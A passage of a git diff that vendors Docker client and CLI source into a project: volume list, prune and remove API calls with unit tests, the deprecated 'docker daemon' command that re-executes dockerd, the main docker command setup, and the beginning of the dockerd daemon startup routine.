+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "GET" {
+				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
+			}
+			content, err := json.Marshal(types.Volume{
+				Name:       "name",
+				Driver:     "driver",
+				Mountpoint: "mountpoint",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	v, err := client.VolumeInspect(context.Background(), "volume_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if v.Name != "name" {
+		t.Fatalf("expected `name`, got %s", v.Name)
+	}
+	if v.Driver != "driver" {
+		t.Fatalf("expected `driver`, got %s", v.Driver)
+	}
+	if v.Mountpoint != "mountpoint" {
+		t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go
new file mode 100644
index 0000000000..32247ce115
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_list.go
@@ -0,0 +1,32 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types/filters"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+// VolumeList returns the volumes configured in the docker host.
+func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) {
+	var volumes volumetypes.VolumesListOKBody
+	query := url.Values{}
+
+	if filter.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cli.version, filter)
+		if err != nil {
+			return volumes, err
+		}
+		query.Set("filters", filterJSON)
+	}
+	resp, err := cli.get(ctx, "/volumes", query, nil)
+	if err != nil {
+		return volumes, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&volumes)
+	ensureReaderClosed(resp)
+	return volumes, err
+}
diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go
new file mode 100644
index 0000000000..f29639be23
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_list_test.go
@@ -0,0 +1,98 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+func TestVolumeListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.VolumeList(context.Background(), filters.NewArgs())
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestVolumeList(t *testing.T) {
+	expectedURL := "/volumes"
+
+	noDanglingFilters := filters.NewArgs()
+	noDanglingFilters.Add("dangling", "false")
+
+	danglingFilters := filters.NewArgs()
+	danglingFilters.Add("dangling", "true")
+
+	labelFilters := filters.NewArgs()
+	labelFilters.Add("label", "label1")
+	labelFilters.Add("label", "label2")
+
+	listCases := []struct {
+		filters         filters.Args
+		expectedFilters string
+	}{
+		{
+			filters:         filters.NewArgs(),
+			expectedFilters: "",
+		}, {
+			filters:         noDanglingFilters,
+			expectedFilters: `{"dangling":{"false":true}}`,
+		}, {
+			filters:         danglingFilters,
+			expectedFilters: `{"dangling":{"true":true}}`,
+		}, {
+			filters:         labelFilters,
+			expectedFilters: `{"label":{"label1":true,"label2":true}}`,
+		},
+	}
+
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				actualFilters := query.Get("filters")
+				if actualFilters != listCase.expectedFilters {
+					return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters)
+				}
+				content, err := json.Marshal(volumetypes.VolumesListOKBody{
+					Volumes: []*types.Volume{
+						{
+							Name:   "volume",
+							Driver: "local",
+						},
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		volumeResponse, err := client.VolumeList(context.Background(), listCase.filters)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(volumeResponse.Volumes) != 1 {
+			t.Fatalf("expected 1 volume, got %v", volumeResponse.Volumes)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go
new file mode 100644
index 0000000000..a07e4ce637
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_prune.go
@@ -0,0 +1,36 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// VolumesPrune requests the daemon to delete unused data
+func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args) (types.VolumesPruneReport, error) {
+	var report types.VolumesPruneReport
+
+	if err := cli.NewVersionError("1.25", "volume prune"); err != nil {
+		return report, err
+	}
+
+	query, err := getFiltersQuery(pruneFilters)
+	if err != nil {
+		return report, err
+	}
+
+	serverResp, err := cli.post(ctx, "/volumes/prune", query, nil, nil)
+	if err != nil {
+		return report, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
+		return report, fmt.Errorf("Error retrieving disk usage: %v", err)
+	}
+
+	return report, nil
+}
diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go
new file mode 100644
index 0000000000..6c26575b49
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_remove.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types/versions"
+	"golang.org/x/net/context"
+)
+
+// VolumeRemove removes a volume from the docker host.
+func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool) error {
+	query := url.Values{}
+	if versions.GreaterThanOrEqualTo(cli.version, "1.25") {
+		if force {
+			query.Set("force", "1")
+		}
+	}
+	resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go
new file mode 100644
index 0000000000..1fe657349a
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_remove_test.go
@@ -0,0 +1,47 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestVolumeRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.VolumeRemove(context.Background(), "volume_id", false)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestVolumeRemove(t *testing.T) {
+	expectedURL := "/volumes/volume_id"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.VolumeRemove(context.Background(), "volume_id", false)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go
new file mode 100644
index 0000000000..65f9f37be2
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go
@@ -0,0 +1,27 @@
+// +build !daemon
+
+package main
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+
+	"github.com/spf13/cobra"
+)
+
+func newDaemonCommand() *cobra.Command {
+	return &cobra.Command{
+		Use:    "daemon",
+		Hidden: true,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runDaemon()
+		},
+	}
+}
+
+func runDaemon() error {
+	return fmt.Errorf(
+		"`docker daemon` is not supported on %s. Please run `dockerd` directly",
+		strings.Title(runtime.GOOS))
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
new file mode 100644
index 0000000000..32032fe1b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
@@ -0,0 +1,17 @@
+// +build !daemon
+
+package main
+
+import (
+	"testing"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestDaemonCommand(t *testing.T) {
+	cmd := newDaemonCommand()
+	cmd.SetArgs([]string{"--help"})
+	err := cmd.Execute()
+
+	assert.Error(t, err, "Please run `dockerd`")
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
new file mode 100644
index 0000000000..26348a8843
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
@@ -0,0 +1,30 @@
+// +build daemon
+
+package main
+
+import (
+	"testing"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/spf13/cobra"
+)
+
+func stubRun(cmd *cobra.Command, args []string) error {
+	return nil
+}
+
+func TestDaemonCommandHelp(t *testing.T) {
+	cmd := newDaemonCommand()
+	cmd.RunE = stubRun
+	cmd.SetArgs([]string{"--help"})
+	err := cmd.Execute()
+	assert.NilError(t, err)
+}
+
+func TestDaemonCommand(t *testing.T) {
+	cmd := newDaemonCommand()
+	cmd.RunE = stubRun
+	cmd.SetArgs([]string{"--containerd", "/foo"})
+	err := cmd.Execute()
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
new file mode 100644
index 0000000000..f68d220c2f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
@@ -0,0 +1,79 @@
+// +build daemon
+
+package main
+
+import (
+	"fmt"
+
+	"os"
+	"os/exec"
+	"path/filepath"
+	"syscall"
+
+	"github.com/spf13/cobra"
+)
+
+const daemonBinary = "dockerd"
+
+func newDaemonCommand() *cobra.Command {
+	cmd := &cobra.Command{
+		Use:                "daemon",
+		Hidden:             true,
+		Args:               cobra.ArbitraryArgs,
+		DisableFlagParsing: true,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runDaemon()
+		},
+		Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.",
+	}
+	cmd.SetHelpFunc(helpFunc)
+	return cmd
+}
+
+// CmdDaemon execs dockerd with the same flags
+func runDaemon() error {
+	// Use os.Args[1:] so that "global" args are passed to dockerd
+	return execDaemon(stripDaemonArg(os.Args[1:]))
+}
+
+func execDaemon(args []string) error {
+	binaryPath, err := findDaemonBinary()
+	if err != nil {
+		return err
+	}
+
+	return syscall.Exec(
+		binaryPath,
+		append([]string{daemonBinary}, args...),
+		os.Environ())
+}
+
+func helpFunc(cmd *cobra.Command, args []string) {
+	if err := execDaemon([]string{"--help"}); err != nil {
+		fmt.Fprintf(os.Stderr, "%s\n", err.Error())
+	}
+}
+
+// findDaemonBinary looks for the path to the dockerd binary starting with
+// the directory of the current executable (if one exists) and followed by $PATH
+func findDaemonBinary() (string, error) {
+	execDirname := filepath.Dir(os.Args[0])
+	if execDirname != "" {
+		binaryPath := filepath.Join(execDirname, daemonBinary)
+		if _, err := os.Stat(binaryPath); err == nil {
+			return binaryPath, nil
+		}
+	}
+
+	return exec.LookPath(daemonBinary)
+}
+
+// stripDaemonArg removes the `daemon` argument from the list
+func stripDaemonArg(args []string) []string {
+	for i, arg := range args {
+		if arg == "daemon" {
+			return append(args[:i], args[i+1:]...)
+		}
+	}
+	return args
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go
new file mode 100644
index 0000000000..d4847a90ee
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/docker.go
@@ -0,0 +1,180 @@
+package main
+
+import (
+	"errors"
+	"fmt"
+	"os"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/commands"
+	cliflags "github.com/docker/docker/cli/flags"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/term"
+	"github.com/docker/docker/utils"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := cliflags.NewClientOptions()
+	var flags *pflag.FlagSet
+
+	cmd := &cobra.Command{
+		Use:              "docker [OPTIONS] COMMAND [ARG...]",
+		Short:            "A self-sufficient runtime for containers",
+		SilenceUsage:     true,
+		SilenceErrors:    true,
+		TraverseChildren: true,
+		Args:             noArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if opts.Version {
+				showVersion()
+				return nil
+			}
+			return dockerCli.ShowHelp(cmd, args)
+		},
+		PersistentPreRunE: func(cmd *cobra.Command, args []string) error {
+			// daemon command is special, we redirect directly to another binary
+			if cmd.Name() == "daemon" {
+				return nil
+			}
+			// flags must be the top-level command flags, not cmd.Flags()
+			opts.Common.SetDefaultOptions(flags)
+			dockerPreRun(opts)
+			if err := dockerCli.Initialize(opts); err != nil {
+				return err
+			}
+			return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental())
+		},
+	}
+	cli.SetupRootCommand(cmd)
+
+	cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) {
+		if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed.
+			// flags must be the top-level command flags, not cmd.Flags()
+			opts.Common.SetDefaultOptions(flags)
+			dockerPreRun(opts)
+			dockerCli.Initialize(opts)
+		}
+
+		if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil {
+			ccmd.Println(err)
+			return
+		}
+
+		hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental())
+
+		if err := ccmd.Help(); err != nil {
+			ccmd.Println(err)
+		}
+	})
+
+	flags = cmd.Flags()
+	flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit")
+	flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files")
+	opts.Common.InstallFlags(flags)
+
+	cmd.SetOutput(dockerCli.Out())
+	cmd.AddCommand(newDaemonCommand())
+	commands.AddCommands(cmd, dockerCli)
+
+	return cmd
+}
+
+func noArgs(cmd *cobra.Command, args []string) error {
+	if len(args) == 0 {
+		return nil
+	}
+	return fmt.Errorf(
+		"docker: '%s' is not a docker command.\nSee 'docker --help'", args[0])
+}
+
+func main() {
+	// Set terminal emulation based on platform as required.
+	stdin, stdout, stderr := term.StdStreams()
+	logrus.SetOutput(stderr)
+
+	dockerCli := command.NewDockerCli(stdin, stdout, stderr)
+	cmd := newDockerCommand(dockerCli)
+
+	if err := cmd.Execute(); err != nil {
+		if sterr, ok := err.(cli.StatusError); ok {
+			if sterr.Status != "" {
+				fmt.Fprintln(stderr, sterr.Status)
+			}
+			// StatusError should only be used for errors, and all errors should
+			// have a non-zero exit status, so never exit with 0
+			if sterr.StatusCode == 0 {
+				os.Exit(1)
+			}
+			os.Exit(sterr.StatusCode)
+		}
+		fmt.Fprintln(stderr, err)
+		os.Exit(1)
+	}
+}
+
+func showVersion() {
+	fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit)
+}
+
+func dockerPreRun(opts *cliflags.ClientOptions) {
+	cliflags.SetLogLevel(opts.Common.LogLevel)
+
+	if opts.ConfigDir != "" {
+		cliconfig.SetConfigDir(opts.ConfigDir)
+	}
+
+	if opts.Common.Debug {
+		utils.EnableDebug()
+	}
+}
+
+func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) {
+	cmd.Flags().VisitAll(func(f *pflag.Flag) {
+		// hide experimental flags
+		if !hasExperimental {
+			if _, ok := f.Annotations["experimental"]; ok {
+				f.Hidden = true
+			}
+		}
+
+		// hide flags not supported by the server
+		if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) {
+			f.Hidden = true
+		}
+
+	})
+
+	for _, subcmd := range cmd.Commands() {
+		// hide experimental subcommands
+		if !hasExperimental {
+			if _, ok := subcmd.Tags["experimental"]; ok {
+				subcmd.Hidden = true
+			}
+		}
+
+		// hide subcommands not supported by the server
+		if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) {
+			subcmd.Hidden = true
+		}
+	}
+}
+
+func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error {
+	if !hasExperimental {
+		if _, ok := cmd.Tags["experimental"]; ok {
+			return errors.New("only supported with experimental daemon")
+		}
+	}
+
+	if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) {
+		return fmt.Errorf("only supported with daemon version >= %s", cmdVersion)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go
new file mode 100644
index 0000000000..8738f6005d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/docker_test.go
@@ -0,0 +1,32 @@
+package main
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/docker/docker/utils"
+)
+
+func TestClientDebugEnabled(t *testing.T) {
+	defer utils.DisableDebug()
+
+	cmd := newDockerCommand(&command.DockerCli{})
+	cmd.Flags().Set("debug", "true")
+
+	err := cmd.PersistentPreRunE(cmd, []string{})
+	assert.NilError(t, err)
+	assert.Equal(t, os.Getenv("DEBUG"), "1")
+	assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel)
+}
+
+func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) {
+	discard := ioutil.Discard
+	cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard))
+	cmd.SetArgs([]string{"help", "invalid"})
+	err := cmd.Execute()
+	assert.Error(t, err, "unknown help topic: invalid")
+}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go
new file mode 100644
index 0000000000..9bc507e20c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go
@@ -0,0 +1,18 @@
+package main
+
+import (
+	"sync/atomic"
+
+	_ "github.com/docker/docker/autogen/winresources/docker"
+)
+
+//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll"
+
+var dummy uintptr
+
+func init() {
+	// Ensure that this import is not removed by the linker. This is used to
+	// ensure that shell32.dll is loaded by the system loader, preventing
+	// go#15286 from triggering on Nano Server TP5.
+	atomic.LoadUintptr(&dummy)
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/README.md b/vendor/github.com/docker/docker/cmd/dockerd/README.md
new file mode 100644
index 0000000000..a8c20b3549
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/README.md
@@ -0,0 +1,3 @@
+docker.go contains Docker daemon's main function.
+
+This file provides first line CLI argument parsing and environment variable setting.
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go
new file mode 100644
index 0000000000..2f099e0199
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go
@@ -0,0 +1,524 @@
+package main
+
+import (
+	"crypto/tls"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/uuid"
+	"github.com/docker/docker/api"
+	apiserver "github.com/docker/docker/api/server"
+	"github.com/docker/docker/api/server/middleware"
+	"github.com/docker/docker/api/server/router"
+	"github.com/docker/docker/api/server/router/build"
+	checkpointrouter "github.com/docker/docker/api/server/router/checkpoint"
+	"github.com/docker/docker/api/server/router/container"
+	"github.com/docker/docker/api/server/router/image"
+	"github.com/docker/docker/api/server/router/network"
+	pluginrouter "github.com/docker/docker/api/server/router/plugin"
+	swarmrouter "github.com/docker/docker/api/server/router/swarm"
+	systemrouter "github.com/docker/docker/api/server/router/system"
+	"github.com/docker/docker/api/server/router/volume"
+	"github.com/docker/docker/builder/dockerfile"
+	cliflags "github.com/docker/docker/cli/flags"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/daemon/cluster"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/libcontainerd"
+	dopts "github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/authorization"
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/pkg/listeners"
+	"github.com/docker/docker/pkg/pidfile"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/registry"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/docker/utils"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/spf13/pflag"
+)
+
+const (
+	flagDaemonConfigFile = "config-file"
+)
+
+// DaemonCli represents the daemon CLI.
+type DaemonCli struct {
+	*daemon.Config
+	configFile *string
+	flags      *pflag.FlagSet
+
+	api             *apiserver.Server
+	d               *daemon.Daemon
+	authzMiddleware *authorization.Middleware // authzMiddleware enables to dynamically reload the authorization plugins
+}
+
+// NewDaemonCli returns a daemon CLI
+func NewDaemonCli() *DaemonCli {
+	return &DaemonCli{}
+}
+
+func migrateKey(config *daemon.Config) (err error) {
+	// No migration necessary on Windows
+	if runtime.GOOS == "windows" {
+		return nil
+	}
+
+	// Migrate trust key if exists at ~/.docker/key.json and owned by current user
+	oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile)
+	newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile)
+	if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) {
+		defer func() {
+			// Ensure old path is removed if no error occurred
+			if err == nil {
+				err = os.Remove(oldPath)
+			} else {
+				logrus.Warnf("Key migration failed, key file not removed at %s", oldPath)
+				os.Remove(newPath)
+			}
+		}()
+
+		if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil {
+			return fmt.Errorf("Unable to create daemon configuration directory: %s", err)
+		}
+
+		newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600)
+		if err != nil {
+			return fmt.Errorf("error creating key file %q: %s", newPath, err)
+		}
+		defer newFile.Close()
+
+		oldFile, err := os.Open(oldPath)
+		if err != nil {
+			return fmt.Errorf("error opening key file %q: %s", oldPath, err)
+		}
+		defer oldFile.Close()
+
+		if _, err := io.Copy(newFile, oldFile); err != nil {
+			return fmt.Errorf("error copying key: %s", err)
+		}
+
+		logrus.Infof("Migrated key from %s to %s", oldPath, newPath)
+	}
+
+	return nil
+}
+
+func (cli *DaemonCli) start(opts daemonOptions) (err error) {
+	stopc := make(chan bool)
+	defer close(stopc)
+
+	// warn from uuid package when running the daemon
+	uuid.Loggerf = logrus.Warnf
+
+	opts.common.SetDefaultOptions(opts.flags)
+
+	if cli.Config, err = loadDaemonCliConfig(opts); err != nil {
+		return err
+	}
+	cli.configFile = &opts.configFile
+	cli.flags = opts.flags
+
+	if opts.common.TrustKey == "" {
+		opts.common.TrustKey = filepath.Join(
+			getDaemonConfDir(cli.Config.Root),
+			cliflags.DefaultTrustKeyFile)
+	}
+
+	if cli.Config.Debug {
+		utils.EnableDebug()
+	}
+
+	if cli.Config.Experimental {
+		logrus.Warn("Running experimental build")
+	}
+
+	logrus.SetFormatter(&logrus.TextFormatter{
+		TimestampFormat: jsonlog.RFC3339NanoFixed,
+		DisableColors:   cli.Config.RawLogs,
+	})
+
+	if err := setDefaultUmask(); err != nil {
+		return fmt.Errorf("Failed to set umask: %v", err)
+	}
+
+	if len(cli.LogConfig.Config) > 0 {
+		if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil {
+			return fmt.Errorf("Failed to set log opts: %v", err)
+		}
+	}
+
+	// Create the daemon root before we create ANY other files (PID, or migrate keys)
+	// to ensure the appropriate ACL is set (particularly relevant on Windows)
+	if err := daemon.CreateDaemonRoot(cli.Config); err != nil {
+		return err
+	}
+
+	if cli.Pidfile != "" {
+		pf, err := pidfile.New(cli.Pidfile)
+		if err != nil {
+			return fmt.Errorf("Error starting daemon: %v", err)
+		}
+		defer func() {
+			if err := pf.Remove(); err != nil {
+				logrus.Error(err)
+			}
+		}()
+	}
+
+	serverConfig := &apiserver.Config{
+		Logging:     true,
+		SocketGroup: cli.Config.SocketGroup,
+		Version:     dockerversion.Version,
+		EnableCors:  cli.Config.EnableCors,
+		CorsHeaders: cli.Config.CorsHeaders,
+	}
+
+	if cli.Config.TLS {
+		tlsOptions := tlsconfig.Options{
+			CAFile:   cli.Config.CommonTLSOptions.CAFile,
+			CertFile: cli.Config.CommonTLSOptions.CertFile,
+			KeyFile:  cli.Config.CommonTLSOptions.KeyFile,
+		}
+
+		if cli.Config.TLSVerify {
+			// server requires and verifies client's certificate
+			tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert
+		}
+		tlsConfig, err := tlsconfig.Server(tlsOptions)
+		if err != nil {
+			return err
+		}
+		serverConfig.TLSConfig = tlsConfig
+	}
+
+	if len(cli.Config.Hosts) == 0 {
+		cli.Config.Hosts = make([]string, 1)
+	}
+
+	api := apiserver.New(serverConfig)
+	cli.api = api
+
+	for i := 0; i < len(cli.Config.Hosts); i++ {
+		var err error
+		if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil {
+			return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err)
+		}
+
+		protoAddr := cli.Config.Hosts[i]
+		protoAddrParts := strings.SplitN(protoAddr, "://", 2)
+		if len(protoAddrParts) != 2 {
+			return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr)
+		}
+
+		proto := protoAddrParts[0]
+		addr := protoAddrParts[1]
+
+		// It's a bad idea to bind to TCP without tlsverify.
+		if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) {
+			logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]")
+		}
+		ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig)
+		if err != nil {
+			return err
+		}
+		ls = wrapListeners(proto, ls)
+		// If we're binding to a TCP port, make sure that a container doesn't try to use it.
+		if proto == "tcp" {
+			if err := allocateDaemonPort(addr); err != nil {
+				return err
+			}
+		}
+		logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr)
+		api.Accept(addr, ls...)
+	}
+
+	if err := migrateKey(cli.Config); err != nil {
+		return err
+	}
+
+	// FIXME: why is this down here instead of with the other TrustKey logic above?
+	cli.TrustKeyPath = opts.common.TrustKey
+
+	registryService := registry.NewService(cli.Config.ServiceOptions)
+	containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...)
+	if err != nil {
+		return err
+	}
+	signal.Trap(func() {
+		cli.stop()
+		<-stopc // wait for daemonCli.start() to return
+	})
+
+	d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote)
+	if err != nil {
+		return fmt.Errorf("Error starting daemon: %v", err)
+	}
+
+	if cli.Config.MetricsAddress != "" {
+		if !d.HasExperimental() {
+			return fmt.Errorf("metrics-addr is only supported when experimental is enabled")
+		}
+		if err := startMetricsServer(cli.Config.MetricsAddress); err != nil {
+			return err
+		}
+	}
+
+	name, _ := os.Hostname()
+
+	c, err := cluster.New(cluster.Config{
+		Root:                   cli.Config.Root,
+		Name:                   name,
+		Backend:                d,
+		NetworkSubnetsProvider: d,
+		DefaultAdvertiseAddr:   cli.Config.SwarmDefaultAdvertiseAddr,
+		RuntimeRoot:            cli.getSwarmRunRoot(),
+	})
+	if err != nil {
+		logrus.Fatalf("Error creating cluster component: %v", err)
+	}
+
+	// Restart all autostart containers which has a swarm endpoint
+	// and is not yet running now that we have successfully
+	// initialized the cluster.
+	d.RestartSwarmContainers()
+
+	logrus.Info("Daemon has completed initialization")
+
